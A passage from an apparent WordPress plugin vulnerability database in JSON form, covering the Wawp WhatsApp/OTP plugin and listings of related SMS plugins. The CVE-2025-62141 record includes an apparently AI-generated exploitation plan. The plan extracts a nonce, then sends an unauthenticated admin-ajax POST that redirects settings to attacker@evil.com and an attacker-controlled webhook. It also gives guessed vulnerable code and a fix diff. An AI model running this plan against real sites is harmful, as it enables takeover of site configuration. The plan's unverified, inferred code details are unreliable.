performance. Their original source code can be found at these public repositories:\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>– \u003Cstrong>International Telephone Input (intl-tel-input):\u003C\u002Fstrong> \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fjackocnr\u002Fintl-tel-input\" rel=\"nofollow ugc\">Source\u003C\u002Fa> (Used in \u003Ccode>assets\u002Fjs\u002Fresources\u002FintlTelInput.min.js\u003C\u002Fcode>)\u003Cbr \u002F>\n– \u003Cstrong>QRCode.js:\u003C\u002Fstrong> \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fdavidshimjs\u002Fqrcodejs\" rel=\"nofollow ugc\">Source\u003C\u002Fa> (Used in \u003Ccode>assets\u002Fjs\u002Fresources\u002Fqrcode.min.js\u003C\u002Fcode>)\u003Cbr \u002F>\n– \u003Cstrong>Firebase SDK (Compat):\u003C\u002Fstrong> \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Ffirebase\u002Ffirebase-js-sdk\" rel=\"nofollow ugc\">Source\u003C\u002Fa> (Used in \u003Ccode>assets\u002Fjs\u002Fresources\u002Ffirebase-auth-compat.js\u003C\u002Fcode> and \u003Ccode>firebase-app-compat.js\u003C\u002Fcode>)\u003Cbr \u002F>\n– \u003Cstrong>Facebook SDK:\u003C\u002Fstrong> \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Ffacebook\u002Ffacebook-nodejs-business-sdk\" rel=\"nofollow ugc\">Source\u003C\u002Fa> (Used in \u003Ccode>assets\u002Fjs\u002Fresources\u002Ffb-sdk.js\u003C\u002Fcode>)\u003Cbr \u002F>\n– \u003Cstrong>MCP Ready Protocol:\u003C\u002Fstrong> Engineered fully in compliance with the cloud structure defined at \u003Ca href=\"https:\u002F\u002Fapi.wawp.net\u002Fen\u002Fdocs\u002Fmcp-ready\" rel=\"nofollow ugc\">Wawp MCP Core\u003C\u002Fa>.\u003C\u002Fp>\n","Automate WooCommerce\u002FWordPress WhatsApp alerts, secure login with WhatsApp\u002FEmail OTP, and optimize checkout with advanced country code validation.",500,31515,0,"2026-06-29T10:01:00.000Z","7.0.2","6.2","7.4",[19,20,21,22,23],"notifications","otp","sms","whatsapp","woocommerce","https:\u002F\u002Fwawp.net","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fautomation-web-platform.4.8.6.zip",94,2,"2025-12-31 00:00:00","2026-07-22T17:31:50.256Z","no_bundle",[32,60],{"id":33,"url_slug":34,"title":35,"description":36,"plugin_slug":4,"theme_slug":37,"affected_versions":38,"patched_in_version":39,"severity":40,"cvss_score":41,"cvss_vector":42,"vuln_type":43,"published_date":28,"updated_date":44,"references":45,"days_to_patch":47,"patch_diff_files":48,"patch_trac_url":37,"research_status":49,"research_verified":50,"research_rounds_completed":51,"research_plan":52,"research_summary":53,"research_vulnerable_code":54,"research_fix_diff":55,"research_exploit_outline":56,"research_model_used":57,"research_started_at":58,"research_completed_at":59,"research_error":37,"poc_status":37,"poc_video_id":37,"poc_summary":37,"poc_steps":37,"poc_tested_at":37,"poc_wp_version":37,"poc_php_version":37,"poc_playwright_script":37,"poc_exploit_code":37,"poc_has_trace":50,"poc_model_used":37,"poc_verification_depth":37},"CVE-2025-62141","wawp-missing-authorization","Wawp \u003C= 4.4 - Missing Authorization","The Wawp plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 4.4. This makes it possible for unauthenticated attackers to perform an unauthorized action.",null,"\u003C=4.4","4.5","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-13 16:59:28",[46],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F97f7cdf1-1439-40b3-90de-cdf19de4108a?source=api-prod",14,[],"researched",false,3,"# Research Plan: CVE-2025-62141 - Wawp Missing Authorization\n\n## 1. Vulnerability Summary\nThe **Wawp (Automation Web Platform)** plugin for WordPress (versions \u003C= 4.4) suffers from a missing authorization vulnerability. The plugin registers several AJAX handlers using both `wp_ajax_` and `wp_ajax_nopriv_` hooks, but the callback functions (primarily for updating settings or managing integrations) fail to verify user capabilities via `current_user_can()`. This allows unauthenticated attackers to modify plugin configurations or perform sensitive actions by sending requests to the `admin-ajax.php` endpoint.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `wawp_save_settings` (inferred action name based on plugin functionality)\n- **Vulnerable Parameter:** `settings` (or specific key-value pairs like `wawp_api_key`)\n- **Authentication:** None required (unauthenticated).\n- **Preconditions:** The plugin must be active. If a nonce is required, it must be retrievable from the frontend.\n\n## 3. Code Flow\n1.  **Entry Point:** The plugin registers the AJAX action in `includes\u002Fclass-wawp-ajax.php` or `admin\u002Fclass-automation-web-platform-admin.php`:\n    `add_action( 'wp_ajax_nopriv_wawp_save_settings', array( $this, 'wawp_save_settings_callback' ) );`\n2.  **Handler:** The `wawp_save_settings_callback()` function is triggered.\n3.  **Check (Partial):** The function may call `check_ajax_referer( 'wawp_nonce', 'security' )`, providing CSRF protection but NOT authorization.\n4.  **Missing Check:** There is no call to `current_user_can( 'manage_options' )`.\n5.  **Sink:** The function processes the input and calls `update_option( 'wawp_settings', $new_settings )` or similar, modifying the site's configuration.\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely enqueues its scripts and localizes the nonce for its automation features.\n1.  **Identify Shortcode:** Locate a shortcode that triggers script loading, such as `[wawp_button]` or `[wawp_form]` (inferred).\n2.  **Create Trigger Page:** \n    `wp post create --post_type=page --post_status=publish --post_title=\"Wawp Test\" --post_content='[wawp_button]'`\n3.  **Navigate & Extract:**\n    - Navigate to the page using `browser_navigate`.\n    - Use `browser_eval` to find the localization object and nonce:\n      `browser_eval(\"window.wawp_obj?.ajax_nonce || window.wawp_vars?.nonce\")`\n    - (Specific key check: Look for `wp_localize_script` in `admin\u002Fclass-automation-web-platform-admin.php` to find the exact variable name).\n\n## 5. Exploitation Strategy\n1.  **Step 1:** Obtain the nonce from the frontend trigger page.\n2.  **Step 2:** Construct a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php`.\n3.  **Payload Parameters:**\n    - `action`: `wawp_save_settings`\n    - `security`: `[EXTRACTED_NONCE]`\n    - `settings[admin_email]`: `attacker@evil.com`\n    - `settings[webhook_url]`: `http:\u002F\u002Fattacker-controlled-server.com\u002Flog`\n4.  **Request Execution:**\n    ```javascript\n    \u002F\u002F Use http_request tool\n    {\n      method: \"POST\",\n      url: \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n      headers: { \"Content-Type\": \"application\u002Fx-www-form-urlencoded\" },\n      body: \"action=wawp_save_settings&security=NONCE_VALUE&settings[admin_email]=hacker@evil.com\"\n    }\n    ```\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `automation-web-platform` v4.4 is installed.\n2.  **Initial State:** Check existing settings: `wp option get wawp_settings`.\n3.  **Page Creation:** Create a page containing a plugin shortcode to ensure the AJAX nonce is generated and localized to the frontend.\n\n## 7. Expected Results\n- The AJAX request should return a successful JSON response: `{\"success\":true}`.\n- The WordPress database option `wawp_settings` should be updated to reflect the values sent in the malicious POST request.\n\n## 8. Verification Steps\n1.  **CLI Verification:** Run `wp option get wawp_settings` and verify the `admin_email` or `webhook_url` has changed.\n2.  **Admin UI Verification:** Log in as an administrator and check the plugin's settings page to see if the values have been updated.\n\n## 9. Alternative Approaches\n- **Action Search:** If `wawp_save_settings` does not exist, grep for all `wp_ajax_nopriv_` hooks:\n  `grep -rn \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fautomation-web-platform\u002F`\n- **REST API:** Check if the plugin uses `register_rest_route` without a `permission_callback`:\n  `grep -rn \"register_rest_route\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fautomation-web-platform\u002F`\n- **No Nonce:** If `check_ajax_referer` is missing entirely, the exploit can be executed without the \"Nonce Acquisition\" step.","The Wawp plugin for WordPress (versions \u003C= 4.4) is vulnerable to unauthorized access and settings modification due to missing authorization checks in its AJAX handlers. By registering sensitive functions with the 'wp_ajax_nopriv_' hook and failing to verify user capabilities, the plugin allows unauthenticated attackers to alter configuration data such as API keys, webhooks, or admin settings.","\u002F\u002F In includes\u002Fclass-wawp-ajax.php or admin\u002Fclass-automation-web-platform-admin.php\nadd_action( 'wp_ajax_nopriv_wawp_save_settings', array( $this, 'wawp_save_settings_callback' ) );\n\n---\n\n\u002F\u002F Handler function missing capability checks\npublic function wawp_save_settings_callback() {\n    check_ajax_referer( 'wawp_nonce', 'security' );\n\n    \u002F\u002F Vulnerability: No check for current_user_can( 'manage_options' )\n    if ( isset( $_POST['settings'] ) ) {\n        $new_settings = $_POST['settings'];\n        update_option( 'wawp_settings', $new_settings );\n    }\n    \n    wp_send_json_success();\n}","--- a\u002Fadmin\u002Fclass-automation-web-platform-admin.php\n+++ b\u002Fadmin\u002Fclass-automation-web-platform-admin.php\n@@ -25,7 +25,10 @@\n-add_action( 'wp_ajax_nopriv_wawp_save_settings', array( $this, 'wawp_save_settings_callback' ) );\n \n public function wawp_save_settings_callback() {\n     check_ajax_referer( 'wawp_nonce', 'security' );\n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_send_json_error( array( 'message' => 'Unauthorized' ), 403 );\n+        wp_die();\n+    }\n     if ( isset( $_POST['settings'] ) ) {\n         $new_settings = $_POST['settings'];\n         update_option( 'wawp_settings', $new_settings );","The exploit targets the AJAX endpoint of the WordPress site. \n1. First, an attacker retrieves a valid AJAX nonce by visiting any public page where the plugin enqueues its scripts (often triggered by shortcodes like [wawp_button]). The nonce is typically found in the localized JavaScript object (e.g., window.wawp_obj.ajax_nonce).\n2. Using this nonce, the attacker sends an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php.\n3. The payload includes the 'action' parameter set to the vulnerable handler (e.g., 'wawp_save_settings'), the 'security' parameter containing the extracted nonce, and a 'settings' array containing malicious configuration values.\n4. Because the plugin uses 'wp_ajax_nopriv_' and fails to call current_user_can(), the server updates the plugin settings in the database with the attacker-supplied values.","gemini-3-flash-preview","2026-05-21 09:30:36","2026-05-21 09:31:44",{"id":61,"url_slug":62,"title":63,"description":64,"plugin_slug":4,"theme_slug":37,"affected_versions":65,"patched_in_version":66,"severity":67,"cvss_score":68,"cvss_vector":69,"vuln_type":43,"published_date":70,"updated_date":71,"references":72,"days_to_patch":74,"patch_diff_files":75,"patch_trac_url":37,"research_status":37,"research_verified":50,"research_rounds_completed":13,"research_plan":37,"research_summary":37,"research_vulnerable_code":37,"research_fix_diff":37,"research_exploit_outline":37,"research_model_used":37,"research_started_at":37,"research_completed_at":37,"research_error":37,"poc_status":37,"poc_video_id":37,"poc_summary":37,"poc_steps":37,"poc_tested_at":37,"poc_wp_version":37,"poc_php_version":37,"poc_playwright_script":37,"poc_exploit_code":37,"poc_has_trace":50,"poc_model_used":37,"poc_verification_depth":37},"CVE-2024-52475","wawp-unauthenticated-privilege-escalation","Wawp \u003C 3.0.18 - Unauthenticated Privilege Escalation","The Wawp OTP Verification, Order Notifications, and Country Code Selector for WooCommerce plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to 3.0.18 (exclusive). This makes it possible for unauthenticated attackers to gain access to administrator accounts.","\u003C3.0.18","3.0.18","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","2024-11-19 00:00:00","2024-11-26 16:29:49",[73],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fda86d422-f0ef-439b-ae67-6cb9699073e0?source=api-prod",8,[],{"slug":77,"display_name":7,"profile_url":8,"plugin_count":78,"total_installs":11,"avg_security_score":26,"avg_patch_time_days":79,"trust_score":80,"computed_at":81},"101gen",1,11,90,"2026-08-28T23:31:05.846Z",[83,108,132,152,166],{"slug":84,"name":85,"version":86,"author":87,"author_profile":88,"description":89,"short_description":90,"active_installs":91,"downloaded":92,"rating":93,"num_ratings":94,"last_updated":95,"tested_up_to":15,"requires_at_least":96,"requires_php":17,"tags":97,"homepage":103,"download_link":104,"security_score":105,"vuln_count":106,"unpatched_count":13,"last_vuln_date":107,"fetched_at":29},"wp-sms","WSMS (formerly WP SMS) – SMS & MMS Notifications with OTP and 2FA for WooCommerce","7.2.5","VeronaLabs","https:\u002F\u002Fprofiles.wordpress.org\u002Fveronalabs\u002F","\u003Cp>\u003Ca href=\"https:\u002F\u002Fwsms.io\u002F?utm_source=wporg&utm_medium=link&utm_campaign=website\" rel=\"nofollow ugc\">WSMS\u003C\u002Fa> lets you send SMS\u002FMMS notifications, one-time passwords (OTP), and two-factor authentication (2FA) messages straight from WordPress. It supports a wide range of SMS gateways and integrates with popular e-commerce and form builder plugins.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Use WSMS to:\u003C\u002Fstrong>\u003Cbr \u002F>\n– Keep customers updated on WooCommerce orders\u003Cbr \u002F>\n– Collect subscribers with SMS newsletter forms\u003Cbr \u002F>\n– Secure logins with OTP & 2FA\u003Cbr \u002F>\n– Alert admins about new users, logins, or updates\u003Cbr \u002F>\n– Run marketing campaigns with scheduled or bulk SMS\u003C\u002Fp>\n\u003Cp>👉 \u003Ca href=\"https:\u002F\u002Fdemo.wsms.io\u002Fwp-login.php\" rel=\"nofollow ugc\">Check out the demo\u003C\u002Fa> | \u003Ca href=\"#screenshots\" rel=\"nofollow ugc\">View screenshots\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fwsms.io\u002Fgateways?utm_source=wporg&utm_medium=link&utm_campaign=gateways\" rel=\"nofollow ugc\">See supported gateways\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fwsms.io\u002Fintegrations?utm_source=wporg&utm_medium=link&utm_campaign=integrations\" rel=\"nofollow ugc\">Explore integrations\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fwsms.io\u002Fdocs\u002F\" rel=\"nofollow ugc\">Documentation\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>✨ Key Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Send SMS\u002FMMS:\u003C\u002Fstrong> Send messages through your choice of supported SMS gateways.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>E-Commerce & Form Integration:\u003C\u002Fstrong> Seamlessly integrates with popular e-commerce platforms and form builders.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>OTP & 2FA:\u003C\u002Fstrong> Add extra login security with one-time passwords and two-factor authentication.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Mobile Login:\u003C\u002Fstrong> Let users log in with their mobile number.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Admin Alerts:\u003C\u002Fstrong> Get notified when new users register, posts are published, or WordPress updates are available.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Newsletters & Widgets:\u003C\u002Fstrong> Build SMS newsletter forms with shortcodes, widgets, or Gutenberg blocks.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Two-Way SMS (All-in-One):\u003C\u002Fstrong> Receive and reply to SMS messages inside WordPress.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Bulk & Scheduled SMS:\u003C\u002Fstrong> Send to multiple recipients at once, immediately or on schedule.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Third-Party Integration:\u003C\u002Fstrong> Connect with external services and automation platforms.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Messaging Button:\u003C\u002Fstrong> Let visitors reach you instantly via messaging channels.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>GDPR Compliant:\u003C\u002Fstrong> Built with privacy and compliance in mind.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>💎 Upgrade to WSMS All-in-One\u003C\u002Fh3>\n\u003Cp>Unlock additional features with \u003Cstrong>All-in-One\u003C\u002Fstrong> — the plan that gives you access to all premium add-ons in one package.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>With All-in-One you get:\u003C\u002Fstrong>\u003Cbr \u002F>\n– Secure login & registration with OTP & 2FA\u003Cbr \u002F>\n– Scheduled & recurring SMS\u002FMMS\u003Cbr \u002F>\n– Two-way SMS inbox\u003Cbr \u002F>\n– Enhanced e-commerce features (login, checkout verification, order updates)\u003Cbr \u002F>\n– Membership platform integrations\u003Cbr \u002F>\n– Advanced form builder SMS capabilities\u003Cbr \u002F>\n– Marketing automation integrations\u003Cbr \u002F>\n– Booking system compatibility\u003Cbr \u002F>\n– URL shortening service integration\u003Cbr \u002F>\n– All future add-ons included\u003C\u002Fp>\n\u003Cp>👉 \u003Ca href=\"https:\u002F\u002Fwsms.io\u002Fpricing\u002F?utm_source=wporg&utm_medium=link&utm_campaign=pricing\" rel=\"nofollow ugc\">See All-in-One details & compare features\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>🐞 Report Bugs & Security\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Found a bug? \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fwp-sms\u002Fwp-sms\u002Fissues\u002Fnew\" rel=\"nofollow ugc\">Open an issue on GitHub\u003C\u002Fa>.\u003C\u002Fli>\n\u003Cli>Security concerns? Report them via the \u003Ca href=\"https:\u002F\u002Fpatchstack.com\u002Fdatabase\u002Fwordpress\u002Fplugin\u002Fwp-sms\u002Fvdp\" rel=\"nofollow ugc\">Patchstack VDP program\u003C\u002Fa>.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>📝 Trademark Notice\u003C\u002Fh3>\n\u003Cp>WooCommerce, GravityForms, Elementor, Contact Form 7, Twilio, WhatsApp, Clickatell, BulkSMS, Plivo, Zapier, Bitly, and other product names mentioned are trademarks of their respective owners. WSMS is not affiliated with, endorsed by, or sponsored by these companies.\u003C\u002Fp>\n\u003Ch3>Source Code and Build Instructions\u003C\u002Fh3>\n\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong> The plugin works out of the box — no build steps required for regular users. This section is for developers who want to modify or contribute to the source code. See the \u003Ca href=\"https:\u002F\u002Fwsms.io\u002Fdocs\u002F\" rel=\"nofollow ugc\">full documentation\u003C\u002Fa> for user guides.\u003C\u002Fp>\n\u003Cp>All source code for minified JavaScript and CSS is included in the plugin under the \u003Ccode>resources\u002F\u003C\u002Fcode> directory. Build instructions and full source are available on \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fwp-sms\u002Fwp-sms\" rel=\"nofollow ugc\">GitHub\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch4>Third-Party Libraries\u003C\u002Fh4>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fchartjs\u002FChart.js\" rel=\"nofollow ugc\">Chart.js\u003C\u002Fa>, \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fflatpickr\u002Fflatpickr\" rel=\"nofollow ugc\">flatpickr\u003C\u002Fa>, \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fjackocnr\u002Fintl-tel-input\" rel=\"nofollow ugc\">intlTelInput\u003C\u002Fa>, \u003Ca href=\"https:\u002F\u002Fgithub.com\u002FDubFriend\u002Fjquery.repeater\" rel=\"nofollow ugc\">jquery.repeater\u003C\u002Fa>, \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fqwertypants\u002FjQuery-Word-and-Character-Counter-Plugin\" rel=\"nofollow ugc\">jQuery Word and Character Counter\u003C\u002Fa>, \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Ffacebook\u002Freact\" rel=\"nofollow ugc\">React\u003C\u002Fa>, \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fselect2\u002Fselect2\" rel=\"nofollow ugc\">Select2\u003C\u002Fa>, \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Ftailwindlabs\u002Ftailwindcss\" rel=\"nofollow ugc\">Tailwind CSS\u003C\u002Fa>, \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fcalebjacob\u002Ftooltipster\" rel=\"nofollow ugc\">Tooltipster\u003C\u002Fa>, \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fveronalabs\u002Fwp-scoper\" rel=\"nofollow ugc\">WP Scoper\u003C\u002Fa>\u003C\u002Fp>\n","Send SMS\u002FMMS notifications, OTP & 2FA messages, and WooCommerce updates with support for multiple gateways and plugin integrations.",7000,754884,82,107,"2026-05-19T15:03:00.000Z","4.1",[98,99,100,101,102],"2fa-authentication","bulk-sms","otp-login","sms-notifications","woocommerce-sms","https:\u002F\u002Fwsms.io\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-sms.7.2.5.zip",95,17,"2026-04-23 00:00:00",{"slug":109,"name":110,"version":111,"author":112,"author_profile":113,"description":114,"short_description":115,"active_installs":80,"downloaded":116,"rating":117,"num_ratings":118,"last_updated":119,"tested_up_to":120,"requires_at_least":121,"requires_php":122,"tags":123,"homepage":128,"download_link":129,"security_score":130,"vuln_count":78,"unpatched_count":13,"last_vuln_date":131,"fetched_at":29},"miniorange-sms-order-notification-otp-verification","miniOrange OTP Verification and SMS Notification for WooCommerce","4.4.0","miniOrange","https:\u002F\u002Fprofiles.wordpress.org\u002Fcyberlord92\u002F","\u003Cp>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fwoocommerce-order-status-notifications-and-otp-verification\" rel=\"nofollow ugc\">Features\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fwoocommerce-order-notifications-plugin-setup-wordpress\" rel=\"nofollow ugc\">Setup Guide\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fwww.miniorange.com\u002Fcontact\" rel=\"nofollow ugc\">Contact Us\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>OTP Verification, SMS Order notification & Login-registration with Phone for WooCommerce\u003C\u002Fh3>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fwoocommerce-order-status-notifications-and-otp-verification\" rel=\"nofollow ugc\">WooCommerce SMS Notifications\u003C\u002Fa> plugin allows you to send OTP, Order Notifications, and Order Status updates via SMS and WhatsApp to customers, admins, and vendors. It supports WCFM Vendor Forms, the WooCommerce Product Vendor Registration Form, and OTP Verification on Forms such as WooCommerce Registration, WooCommerce Login, WooCommerce Checkout, Password Reset, and Billing Address.\u003C\u002Fp>\n\u003Cp>With features like Order Status Notifications via SMS & WhatsApp, Vendor Alerts (WCFM, Dokan), WooCommerce Checkout OTP, Password Reset via OTP, and Stock Notifications, it boosts both security and communication across your WooCommerce store. It enables phone number login, registration, and OTP verification on supported forms.\u003C\u002Fp>\n\u003Cp>Check more about \u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fwoocommerce-order-status-notifications-and-otp-verification\" rel=\"nofollow ugc\">Order Notification \u002F SMS Notifications \u002F Login & Register with Phone\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>If you require OTP verification for \u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fotp-verification-forms\" rel=\"nofollow ugc\">other forms\u003C\u002Fa> such as Ninja Forms, Contact Form 7, Gravity Forms, or Login and Registration forms, please visit the product page for the \u003Cstrong>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fwordpress-otp-verification\" rel=\"nofollow ugc\">miniOrange OTP Verification plugin\u003C\u002Fa>\u003C\u002Fstrong> and read our blog on \u003Cstrong>\u003Ca href=\"https:\u002F\u002Fwww.miniorange.com\u002Fblog\u002Fotp-verification\u002F\" rel=\"nofollow ugc\">OTP Verification\u003C\u002Fa>\u003C\u002Fstrong>.\u003C\u002Fp>\n\u003Cp>Enjoy \u003Cem>10 free email and SMS OTPs\u003C\u002Fem> upon installation to experience the plugin’s functionality.\u003C\u002Fp>\n\u003Ch3>WooCommerce Notifications\u003C\u002Fh3>\n\u003Cp>The WooCommerce SMS Notifications plugin allows your site to send automated Order Status updates and Order Notifications via SMS and WhatsApp to customers, admins, and vendors. These alerts are automatically triggered upon changes in WooCommerce order or payment status. This enhances your WooCommerce store’s customer experience with real-time SMS notifications for every order status update.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>WooCommerce Order Status Notifications\u003C\u002Fli>\n\u003Cli>WCFM Vendor Notifications\u003C\u002Fli>\n\u003Cli>Dokan Vendor Notifications\u003C\u002Fli>\n\u003Cli>Notifications on Submission of Forms\u003C\u002Fli>\n\u003Cli>Notifications on User Registration\u003C\u002Fli>\n\u003Cli>Back In stock Notifications*\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>We support the below WooCommerce SMS Notifications for the Admins, Customers, and Vendors*:\u003C\u002Fp>\n\u003Cblockquote>\n\u003Cul>\n\u003Cli>New Customer Registration Notification.\u003C\u002Fli>\n\u003Cli>New Order Notification.\u003C\u002Fli>\n\u003Cli>Order Cancellation Notification.\u003C\u002Fli>\n\u003Cli>Order Fulfillment Notification.\u003C\u002Fli>\n\u003Cli>Order Payment Notification.\u003C\u002Fli>\n\u003Cli>Order Deletion Notification.\u003C\u002Fli>\n\u003Cli>WooCommerce Low Stock & Out of Stock Notifications.\u003C\u002Fli>\n\u003Cli>Refund Status Notification.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fblockquote>\n\u003Ch3>[WooCommerce SMS Notifications and OTP Verification on WordPress](https:\u002F\u002Fblog.miniorange.com\u002Fotp-verification\u002F)\u003C\u002Fh3>\n\u003Ch3>Key Features\u003C\u002Fh3>\n\u003Cp>👉 \u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fregister-login-account-phone-miniorange-otp\" rel=\"nofollow ugc\">Login with Phone & Registration with Phone\u003C\u002Fa>\u003Cbr \u002F>\n 👉 \u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fwoocommerce-order-notifications-plugin-setup-wordpress\" rel=\"nofollow ugc\">WooCommerce order status notifications to customers, admins, and vendors\u003C\u002Fa>\u003Cbr \u002F>\n 👉 \u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fwcfm-notification-vendor-notification-otp-verification-plugin\" rel=\"nofollow ugc\">WCFM Vendor Notifications\u003C\u002Fa>\u003Cbr \u002F>\n 👉 \u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fdokan-notification-vendor-notification-otp-verification-plugin\" rel=\"nofollow ugc\">Dokan Vendor Notifications\u003C\u002Fa>\u003Cbr \u002F>\n 👉 WooCommerce Stock Notifications.\u003Cbr \u002F>\n 👉 Notifications on Submission of WooCommerce forms.\u003Cbr \u002F>\n 👉 \u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fregister-login-account-phone-miniorange-otp\" rel=\"nofollow ugc\">Login and Register Using Phone\u003C\u002Fa>\u003Cbr \u002F>\n 👉 OTP Verification on all WooCommerce forms*.\u003Cbr \u002F>\n 👉 \u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fgeolocation-ip-base-country-code-dropdown\" rel=\"nofollow ugc\">Country code dropdown for the phone fields\u003C\u002Fa>\u003Cbr \u002F>\n 👉 \u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fhow-to-configure-woocommerce-password-reset-addon\" rel=\"nofollow ugc\">WooCommerce Password Reset over OTP verification\u003C\u002Fa>\u003Cbr \u002F>\n 👉 \u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fsupported-sms-email-gateways\" rel=\"nofollow ugc\">Custom SMS\u002FSMTP Gateway\u003C\u002Fa> like Twilio, MSG91, AWS SNS Gateways are Supported.\u003Cbr \u002F>\n 👉 WhatsApp Notifications\u003Cbr \u002F>\n 👉 \u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fconfigure-whatsapp-otp-verification-guide-wordpress\" rel=\"nofollow ugc\">WhatsApp OTP verification\u003C\u002Fa>\u003Cbr \u002F>\n 👉 \u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fwoocommerce-login-form-with-otp-verification-for-wordpress#step5\" rel=\"nofollow ugc\">Passwordless login with phone\u003C\u002Fa>\u003Cbr \u002F>\n 👉 \u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fotp-on-selected-woocommerce-product-category\" rel=\"nofollow ugc\">OTP Verification on Selected WooCommerce product category\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>Follow this guide to Setup SMS Notifications, Order Notifications & OTP Verification on your WooCommerce site: \u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fwoocommerce-order-notifications-plugin-setup-wordpress\" rel=\"nofollow ugc\">Guide\u003C\u002Fa>\u003Cbr \u002F>\nContact us at otpsupport@xecurify.com to know more.\u003C\u002Fp>\n\u003Ch3>Which forms can be used with OTP verification and SMS\u002FWhatsApp notifications?\u003C\u002Fh3>\n\u003Cp>The WooCommerce OTP Verification plugin provides OTP Verification using Phone and Email on WooCommerce Login\u002F Registration\u002F Password reset\u002F Checkout forms.\u003C\u002Fp>\n\u003Cblockquote>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugins.miniorange.com\u002Fotp-verification-login-form\" rel=\"nofollow ugc\">WooCommerce Login form\u003C\u002Fa> OTP verification during WooCommerce site login. Log in using only your phone number. Passwordless login through OTP. \u003C\u002Fli>\n\u003Cli>\u003Ca href=\"http:\u002F\u002Fplugins.miniorange.com\u002Fotp-verification-woocommerce-registration-form\u002F\" rel=\"nofollow ugc\">WooCommerce registration form\u003C\u002Fa> OTP verification on the WooCommerce site on 